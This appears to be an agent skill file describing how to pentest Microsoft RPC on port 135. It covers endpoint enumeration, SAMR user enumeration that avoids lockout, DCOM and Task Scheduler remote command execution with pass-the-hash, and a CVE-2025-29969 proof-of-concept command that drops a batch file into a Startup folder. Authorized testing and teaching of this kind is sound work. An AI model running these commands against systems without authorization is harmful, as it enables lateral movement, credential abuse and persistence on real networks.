pentesting-msrpc
$
npx mdskill add xalgord/xalgorix/pentesting-msrpc- During authorized Windows/AD assessments when TCP 135 (or 593, or RPC over SMB on 139/445) is open - When mapping which RPC services and named pipes a host exposes (LSA, SAMR, Task Scheduler, Service Control) - When you have valid credentials and want remote code execution via DCOM (dcomexec) - When enumerating network interfaces/IPv6 addresses without authentication via IOXIDResolver - When researching RPC interface attack surface (fuzzing) on an isolated test host
SKILL.md
.github/skills/pentesting-msrpcView on GitHub ↗
--- name: pentesting-msrpc description: Testing the Microsoft RPC (MSRPC / DCE-RPC) endpoint mapper and exposed RPC interfaces during authorized engagements. The endpoint mapper listens on TCP/UDP 135 (also reachable over SMB named pipes on 139/445 and HTTP on 593). Covers endpoint enumeration with rpcdump, IFID-to-named-pipe mapping (lsarpc, samr, svcctl, atsvc), DCOM command execution, IOXIDResolver interface discovery, and RPC interface fuzzing. domain: cybersecurity subdomain: network-services-pentesting tags: - penetration-testing - network-services - msrpc - dcerpc - windows - lateral-movement version: '1.0' author: xalgorix license: Apache-2.0 --- # Pentesting MSRPC (port 135) ## When to Use - During authorized Windows/AD assessments when TCP 135 (or 593, or RPC over SMB on 139/445) is open - When mapping which RPC services and named pipes a host exposes (LSA, SAMR, Task Scheduler, Service Control) - When you have valid credentials and want remote code execution via DCOM (dcomexec) - When enumerating network interfaces/IPv6 addresses without authentication via IOXIDResolver - When researching RPC interface attack surface (fuzzing) on an isolated test host ## Quick Enumeration ```bash # Dump RPC endpoints registered with the endpoint mapper (135) rpcdump.py <IP> -p 135 rpcdump.py -port 135 [[domain/]username[:password]@]<IP> # Map endpoints reachable over SMB named pipes / other transports rpcdump.py -port 139 [[domain/]username[:password]@]<IP> rpcdump.py -port 445 [[domain/]username[:password]@]<IP> # Metasploit DCERPC scanners (all target port 135 except tcp_dcerpc_auditor) msf> use auxiliary/scanner/dcerpc/endpoint_mapper msf> use auxiliary/scanner/dcerpc/hidden msf> use auxiliary/scanner/dcerpc/management msf> use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor ``` ## Critical: Checks Most Often Missed 1. **Endpoint mapper exposes the dynamic port range** — `rpcdump.py` reveals IFID values, the named pipe, and the binding (`ncacn_ip_tcp`, `ncadg_ip_udp`, `ncacn_np`, `ncacn_http`). Each IFID maps to a high-value service. 2. **Named-pipe interfaces of interest:** - `\pipe\lsarpc` (LSA) — enumerate users - `\pipe\samr` (SAMR) — read SAM elements and brute-force users **regardless of account lockout policy** - `\pipe\atsvc` (Task Scheduler) — remote command execution (atexec) - `\pipe\svcctl` / `\pipe\srvsvc` (Service Control) — remote start/stop services + command execution - `\pipe\winreg` (Remote Registry) — read/modify the registry - `\pipe\epmapper` (DCOM) — info gathering and password grinding 3. **IOXIDResolver unauthenticated enumeration** — the `ServerAlive2` method in the IOXIDResolver interface leaks all network interfaces (including IPv6) with no auth. 4. **DCOM RCE with valid creds** — `dcomexec.py` executes commands via DCOM objects (ShellWindows, ShellBrowserWindow, MMC20). 5. **MS-EVEN / CVE-2025-29969 (EventLog-in)** — a TOCTOU flaw in the MS-EVEN interface (`\pipe\even`) lets an authenticated low-privileged user trigger a remote arbitrary file write; it also exposes a file-existence probe primitive. How to CONFIRM: MSRPC is confirmed when `rpcdump.py <IP> -p 135` returns one or more IFID entries with bindings. The presence of `\pipe\samr` confirms SAMR-based user enumeration is possible; `\pipe\svcctl`/`\pipe\atsvc` confirm remote-exec primitives (with creds). ## Workflow ### Step 1: Enumerate RPC endpoints and interfaces ```bash # Primary endpoint discovery rpcdump.py <IP> -p 135 # Sample output line: # IFID: 12345778-1234-abcd-ef00-0123456789ac version 1.0 # Named Pipe: \pipe\samr (LSA SAMR interface) # Binding: ncacn_np:<IP>[\pipe\samr] # Enumerate over alternate transports if 135 is filtered rpcdump.py -port 445 [[domain/]username[:password]@]<IP> # Identify exposed RPC services with Metasploit msf> use auxiliary/scanner/dcerpc/endpoint_mapper msf> set rhosts <IP> msf> run ``` ### Step 2: Unauthenticated interface abuse (IOXIDResolver) ```bash # Leak network interfaces (incl. IPv6) via ServerAlive2 — no creds needed git clone https://github.com/mubix/IOXIDResolver python3 IOXIDResolver.py -t <IP> # Alternative: rpcmap.py from impacket with a stringbinding rpcmap.py 'ncacn_ip_tcp:<IP>' ``` ### Step 3: Authenticated enumeration via named pipes ```bash # SAMR/LSA user enumeration over RPC (account-lockout-safe enumeration) samrdump.py [[domain/]username[:password]@]<IP> rpcclient -U "domain/user%pass" <IP> -c 'enumdomusers' # Remote registry read over \pipe\winreg reg.py domain.local/USER@<IP> -hashes <LM:NT> query -keyName HKLM -s ``` ### Step 4: Command execution / lateral movement ```bash # DCOM RCE with valid credentials (try each object if one is blocked) dcomexec.py [[domain/]username[:password]@]<IP> dcomexec.py -object MMC20 [[domain/]username[:password]@]<IP> dcomexec.py -hashes <LM:NT> administrator@<IP> # Pass-the-Hash # Task Scheduler exec via \pipe\atsvc (port 135/445) atexec.py [[domain/]username[:password]@]<IP> "whoami" # CVE-2025-29969 (MS-EVEN) — authorized PoC only, isolated lab impacket-smbserver -smb2support Share /tmp/safebreach python write_file_remotely.py <target> <attacker> lowuser Test123 \ "/tmp/safebreach/Sample.evtx" "calc.bat" \ "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat" ``` ### Optional: RPC interface fuzzing (isolated VM only) ```powershell # NtObjectManager: turn an RPC server DLL into a client stub Install-Module NtObjectManager -Force $ifs = Get-RpcServer "C:\Windows\System32\efssvc.dll" $ifs | Format-Table Name,Uuid,Version,Procedures Format-RpcClient $ifs[0] -Namespace MS_EFSR -OutputPath .\MS_EFSR.cs # MS-RPC-Fuzzer (DESTRUCTIVE — expect service crashes/BSOD) Import-Module .\MS-RPC-Fuzzer.psm1 Get-RpcServerData -OutPath .\output '.\output\rpcServerData.json' | Invoke-RpcFuzzer -OutPath .\output ``` ## Key Concepts | Concept | Description | |---------|-------------| | **MSRPC / DCE-RPC** | Client-server protocol letting a program invoke a procedure on a remote machine | | **Endpoint mapper** | Service on TCP/UDP 135 that maps interface UUIDs to dynamic ports/pipes | | **IFID** | Interface identifier (UUID + version) uniquely naming an RPC interface | | **Binding / stringbinding** | Transport spec, e.g. `ncacn_ip_tcp`, `ncadg_ip_udp`, `ncacn_np`, `ncacn_http` | | **Named pipe** | SMB-backed transport for RPC (e.g. `\pipe\samr`, `\pipe\svcctl`) | | **SAMR lockout bypass** | The SAMR interface allows password grinding without triggering account lockout | | **IOXIDResolver** | DCOM interface whose ServerAlive2 method leaks interfaces unauthenticated | | **DCOM exec** | Remote code execution via DCOM objects (ShellWindows, MMC20) | ## Tools & Systems | Tool | Purpose | |------|---------| | **impacket rpcdump.py** | Enumerate RPC endpoints/IFIDs across transports | | **impacket rpcmap.py** | Query interfaces by stringbinding | | **impacket dcomexec.py / atexec.py** | DCOM and Task Scheduler remote command execution | | **impacket samrdump.py / reg.py** | SAMR user dump and remote registry access | | **Metasploit dcerpc scanners** | endpoint_mapper, hidden, management, tcp_dcerpc_auditor | | **IOXIDResolver** | Unauthenticated network interface enumeration | | **NtObjectManager / MS-RPC-Fuzzer** | RPC client-stub generation and interface fuzzing | ## Common Scenarios ### Scenario 1: Endpoint Mapping `rpcdump.py <IP> -p 135` lists `\pipe\samr`, `\pipe\svcctl`, and `\pipe\atsvc`, confirming the host exposes user-enumeration and remote-exec interfaces for later credentialed abuse. ### Scenario 2: IPv6 Disclosure On a dual-stack host, IOXIDResolver's ServerAlive2 leaks an internal IPv6 address unauthenticated, opening an IPv6 path that bypasses IPv4 ACLs. ### Scenario 3: DCOM Lateral Movement With a captured local admin hash, `dcomexec.py -object MMC20 -hashes :<hash> administrator@<IP>` yields a semi-interactive shell without creating a new service. ### Scenario 4: Account-Lockout-Safe Enumeration SAMR over `\pipe\samr` enumerates all domain users without incrementing the bad-password counter, providing a clean user list for spraying elsewhere. ## Output Format ``` ## MSRPC Finding **Service**: Microsoft RPC (DCE-RPC) **Severity**: <Critical|High|Medium|Informational> **Host**: <IP>:135 (also 139/445/593 as applicable) ### Summary <What was found: exposed interfaces, IOXIDResolver leak, DCOM RCE, CVE-2025-29969> ### Exposed Interfaces | IFID | Named Pipe | Description | Risk | |------|-----------|-------------|------| | 12345778-1234-abcd-ef00-0123456789ac | \pipe\samr | SAMR user enum | Lockout-safe grinding | | 367abb81-9844-35f1-ad32-98f038001003 | \pipe\svcctl | Service control | Remote exec (creds) | ### Evidence - Command: rpcdump.py <IP> -p 135 - Output: <IFID/binding excerpt> ### Recommendation 1. Restrict access to TCP 135 and the dynamic RPC port range at the firewall 2. Limit RPC over SMB named pipes to trusted management hosts 3. Apply patches for known RPC CVEs (e.g. CVE-2025-29969 / MS-EVEN) 4. Enforce strong credentials to limit DCOM/SAMR abuse impact ```